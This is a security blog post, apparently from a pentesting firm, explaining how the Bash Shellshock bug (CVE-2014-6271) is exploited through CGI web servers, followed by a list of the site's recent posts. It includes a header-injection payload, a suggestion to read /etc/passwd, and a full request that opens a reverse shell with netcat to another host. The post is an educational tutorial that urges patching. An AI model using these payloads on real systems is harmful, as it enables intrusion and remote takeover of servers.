Exploiting Shellshock
A lot of news articles are published currently about a series of Bugs which were found in Bash recently. This Post shows how to easily write a remote exploit for the first of these Bugs (CVE-2014-6271).
Let us first try to understand how this exploit works. The example test code to check if a bash installation is vulnerable which can be found on many sites is the following:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If this code is executed on a vulnerable system, the output will be
vulnerable
this is a test
The command “env
” is used to set a specific variable (in this example “$x
”) within the environment before our test code ”echo this is a test
” is executed. The vulnerability is, that bash interprets the string “() {
” as the start of a function and evaluates the function before executing the desired command. Note, that the name of the Variable doesn’t matter for the vulnerability to work.
Let us look, how this can be used to remotely exploit a Webserver which uses bash script to deliver web pages. In order to investigate the things which happen here, we setup a small cgi-script with the following content:
#!/bin/bash
echo
env
If we browse to this page, we get a print of all environment variables which are set during the generation of our webpage. Let us browse to this page and set some extra HTTP Headers in advance. I used the Firefox AddOn “Modify Headers” to add the two HTTP-Headers: Foo: bar
and Cookie: spam=ham
.
What we see in the response is, that several headers which are coming from the client are set as environment variable during execution. In each of these variables we can inject malicious code. This code will be executed before the webpage is delivered, regardless if it is used or not. Let us assume the Webserver executes the following Hello-World Webpage:
#!/bin/bash
echo
echo "Hello World!"
Note, that the Webpage itself does not use any user input at all. It just statically prints out “Hello World!”. However, as we have seen before bash uses our input.
We can first try to inject the example test code. Note, that we have to add an empty “echo
” to the example in order to get the output to the content of the HTTP Request. (Apache will interpret this as a Response Header otherwise.)
Instead of doing a simple echo, we can execute arbitrary code at the server like “cat /etc/passwd
“
And of course open a reverse shell:
% echo |nc 192.168.122.27 80 <<EOF
GET /cgi-bin/bash.cgi HTTP/1.1
Host: foo
Foo: () { :; }; /bin/nc -e /bin/bash 192.168.122.1 2222;
EOF
I hope everyone understood now that Shellshock can be exploited very easily. Patches are available and should be installed as soon as possible.
Recent posts
Update – WordPress Author Security
Update: Our WordPress Author Security Plugin is now available in the WordPress Plugin Store.
WordPress Author Security
How can you actively prevent usernames from being enumerated on WordPress author pages?
Pentest FAQ – #18 and #19 – How are vulnerabilities found evaluated? And what is the CVSS?
In our Big Application Security Penetration Test FAQ for clients we answer everything you should know before, during and after the commissioning of an Application Security Penetration Test.
In focus today: Questions #18 and #19 – How are vulnerabilities found evaluated? And what is the CVSS?
Attack Afternoon – CSRF Countermeasures #2
CSRF Countermeasures #2: Another way to protect against CSRF – stateless – is the Double Submit Cookie method.
NinjaDVA – Our Training Environment
The NinjaDVA is our comfortable and flexible training environment.